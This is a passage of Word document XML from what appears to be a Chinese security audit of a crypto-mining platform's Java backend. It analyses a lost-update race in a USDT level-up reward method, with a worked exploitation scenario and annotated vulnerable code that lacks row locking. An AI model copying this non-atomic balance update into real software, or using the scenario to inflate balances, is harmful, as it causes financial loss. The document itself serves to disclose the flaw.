      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="36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36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：普通用户（需具备可触发等级提升的矿机）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="36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grantUsdtOnLevelUp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 在读取 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>UserAccount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 时使用的是普通查询 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userAccountRepository.findByUserId(userId)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>不附带任何行级锁（无 `SELECT … FOR UPDATE`）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">。随后对 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>usdtBalance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的「读取→相加→写回」整个过程为非原子操作，形成经典 Read-Modify-Write 竞态窗口。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>代码注释已明确承认这是刻意设计以避免死锁：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>&gt; "须在 recalc 的 User 行锁内调用，勿再锁 account 以免与 purchase 死锁"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">然而这一设计让 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>UserAccount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>usdtBalance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 字段完全暴露于并发写入的 Lost Update 问题中。若同期存在任何其他修改 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>usdtBalance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的事务（购买扣款、提现、其他奖励发放等），两个事务各自读取旧值后分别写入，后提交者将覆盖先提交者的结果，最终余额偏离正确值。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>最危险的利用方向</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（用户获利）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="366"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">用户当前 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>usdtBalance = 1000</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="367"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">线程 A（本次升级奖励）：读 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>balance = 1000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，准备写 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>1000 + 50 = 1050</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="368"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">线程 B（消费扣款 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>purchase</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">）：读 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>balance = 1000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，写 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>1000 - 300 = 700</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，先提交 → DB 余额 = 700</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="369"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">线程 A 提交：写 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>1050</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>覆盖</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 线程 B 的结果 → DB 余额 = 1050</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="370"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">用户实际应得余额 = 1000 + 50 - 300 = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>750</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，实际写入 = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1050</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，凭空多出 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>300 USDT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>反向情形同样存在（奖励丢失），但对平台而言前者更具资金安全威胁。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="37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PowerScheduler.resetExpiredCharging()          (@Scheduled + @Transactional)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    │  发现过期矿机，重置 isCharged=0</w:t>
              <w:br/>
              <w:t xml:space="preserve">    └─ minerService.recalcUserLevelAndHashRate(userId)   (@Transactional REQUIRED，共用同一事务)</w:t>
              <w:br/>
              <w:t xml:space="preserve">         │</w:t>
              <w:br/>
              <w:t xml:space="preserve">         └─ userRepository.findByIdForUpdate(userId)   ← User 行持有 FOR UPDATE 锁</w:t>
              <w:br/>
              <w:t xml:space="preserve">              │  maxLevel &gt; oldLevel → 触发升级分支</w:t>
              <w:br/>
              <w:t xml:space="preserve">              └─ grantUsdtOnLevelUp(userId, oldLevel+1, userNewLevel)</w:t>
              <w:br/>
              <w:t xml:space="preserve">                   │</w:t>
              <w:br/>
              <w:t xml:space="preserve">                   ├─ userAccountRepository.findByUserId(userId)   ← ⚠️ 无锁读，竞态窗口开始</w:t>
              <w:br/>
              <w:t xml:space="preserve">                   ├─ account.setUsdtBalance(old + total)          ← ⚠️ 非原子 read-modify-write</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">                   └─ userAccountRepository.save(account)          ← ⚠️ 可覆盖并发事务写入</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">关键点：外层 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userRepository.findByIdForUpdate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 仅锁定 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>User</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 表行，而 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>UserAccount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 表的对应行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>始终无锁</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">。任何同期操作该用户 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>usdtBalance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的事务（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>purchase</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、提现、其他定时奖励等）与本方法之间均不存在互斥保护。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="37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：若并发扣款与升级奖励发放的竞态被触发（或被有意构造），可导致：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="373"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>用户 USDT 余额被错误抬高（扣款被奖励写覆盖 → 用户凭空获利）；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="374"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>或奖励被并发写覆盖（用户合法奖励丢失）；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="375"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>usdtTotalBalance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（累计获得量统计字段）同样受影响，数据统计失真。</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调度入口：PowerScheduler.java</w:t>
              <w:br/>
              <w:t>@Scheduled(fixedRate = 60_000)</w:t>
              <w:br/>
              <w:t>@Transactional</w:t>
              <w:br/>
              <w:t>public void resetExpiredCharging() {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    LocalDateTime now = LocalDateTime.now();</w:t>
              <w:br/>
              <w:t xml:space="preserve">    List&lt;UserMiner&gt; expired = userMinerRepository.findExpiredCharging(now); // ← 查过期矿机</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (expired.isEmpty()) return;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    Set&lt;Long&gt; affectedUserIds = expired.stream().map(UserMiner::getUserId)</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .filter(id -&gt; id != null).collect(Collectors.toSet());</w:t>
              <w:br/>
              <w:t xml:space="preserve">    for (UserMiner m : expired) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        m.setIsCharged(0);</w:t>
              <w:br/>
              <w:t xml:space="preserve">        m.setChargedExpireTime(null);</w:t>
              <w:br/>
              <w:t xml:space="preserve">        userMinerRepository.save(m);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    for (Long userId : affectedUserIds) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        try {</w:t>
              <w:br/>
              <w:t xml:space="preserve">            minerService.recalcUserLevelAndHashRate(userId); // ← 触发等级重算，可能进入升级分支</w:t>
              <w:br/>
              <w:t xml:space="preserve">        } catch (Exception ignored) {}</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② 等级重算：MinerService.java - recalcUserLevelAndHashRate</w:t>
              <w:br/>
              <w:t>@Transactional</w:t>
              <w:br/>
              <w:t>public void recalcUserLevelAndHashRate(Long userId) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    List&lt;UserMiner&gt; miners = userMinerRepository.findByUserIdAndInStorage(userId, 0);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    int maxLevel = miners.stream().mapToInt(UserMiner::getMinerLevel).max().orElse(0);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    BigDecimal totalHash = computeBaseTotalHashRate(userId);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userRepository.findByIdForUpdate(userId).ifPresent(u -&gt; { // ← User 行上持有 FOR UPDATE 锁</w:t>
              <w:br/>
              <w:t xml:space="preserve">        int oldLevel = u.getCurrentLevel() != null ? u.getCurrentLevel() : 0;</w:t>
              <w:br/>
              <w:t xml:space="preserve">        int userNewLevel = Math.max(maxLevel, oldLevel);</w:t>
              <w:br/>
              <w:t xml:space="preserve">        u.setCurrentLevel(userNewLevel);</w:t>
              <w:br/>
              <w:t xml:space="preserve">        u.setCurrentTotalHashRate(totalHash);</w:t>
              <w:br/>
              <w:t xml:space="preserve">        userRepository.save(u);</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">        if (userNewLevel &gt; oldLevel) {</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> // ← 触发升级奖励分支</w:t>
              <w:br/>
              <w:t xml:space="preserve">            taskExecutionService.updateProgress(u.getId(), "8", 1);</w:t>
              <w:br/>
              <w:t xml:space="preserve">            grantUsdtOnLevelUp(userId, oldLevel + 1, userNewLevel); // ← 污点流向余额写入</w:t>
              <w:br/>
              <w:t xml:space="preserve">            levelRewardService.claimLevelReward(userId, userNewLevel);</w:t>
              <w:br/>
              <w:t xml:space="preserve">        }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    });</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ③ 漏洞点：MinerService.java - grantUsdtOnLevelUp</w:t>
              <w:br/>
              <w:t>private void grantUsdtOnLevelUp(Long userId, int fromLevel, int toLevel) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    UserAccount account = userAccountRepository.findByUserId(userId).orElse(null); // ← ⚠️ 无 FOR UPDATE，竞态窗口开启</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (account == null) return;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    User user = userRepository.findById(userId).orElse(null);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (user == null) return;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    Long regionId = regionManageService.getRegionIdForUser(user);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    BigDecimal total = BigDecimal.ZERO;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    for (int level = fromLevel; level &lt;= toLevel; level++) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        BigDecimal amt = usdtLevelConfigRepository.findByRegionIdAndLevel(regionId, level)</w:t>
              <w:br/>
              <w:t xml:space="preserve">                .map(UsdtLevelConfig::getEstimatedUsdt)</w:t>
              <w:br/>
              <w:t xml:space="preserve">                .filter(a -&gt; a != null &amp;&amp; a.compareTo(BigDecimal.ZERO) &gt; 0)</w:t>
              <w:br/>
              <w:t xml:space="preserve">                .orElse(BigDecimal.ZERO);</w:t>
              <w:br/>
              <w:t xml:space="preserve">        total = total.add(amt);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (total.compareTo(BigDecimal.ZERO) &gt; 0) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        account.setUsdtBalance(</w:t>
              <w:br/>
              <w:t xml:space="preserve">            account.getUsdtBalance() != null</w:t>
              <w:br/>
              <w:t xml:space="preserve">                ? account.getUsdtBalance().add(total)   // ← ⚠️ 基于无锁读取的旧值叠加，并发时可被覆盖</w:t>
              <w:br/>
              <w:t xml:space="preserve">                : total</w:t>
              <w:br/>
              <w:t xml:space="preserve">        );</w:t>
              <w:br/>
              <w:t xml:space="preserve">        account.setUsdtTotalBalance(</w:t>
              <w:br/>
              <w:t xml:space="preserve">            account.getUsdtTotalBalance() != null</w:t>
              <w:br/>
              <w:t xml:space="preserve">                ? account.getUsdtTotalBalance().add(total) // ← ⚠️ 同上，非原子</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">               : total</w:t>
              <w:br/>
              <w:t xml:space="preserve">        );</w:t>
              <w:br/>
              <w:t xml:space="preserve">        userAccountRepository.save(account); // ← ⚠️ 若并发事务已提交，此处将覆盖其结果（Lost Update）</w:t>
              <w:br/>
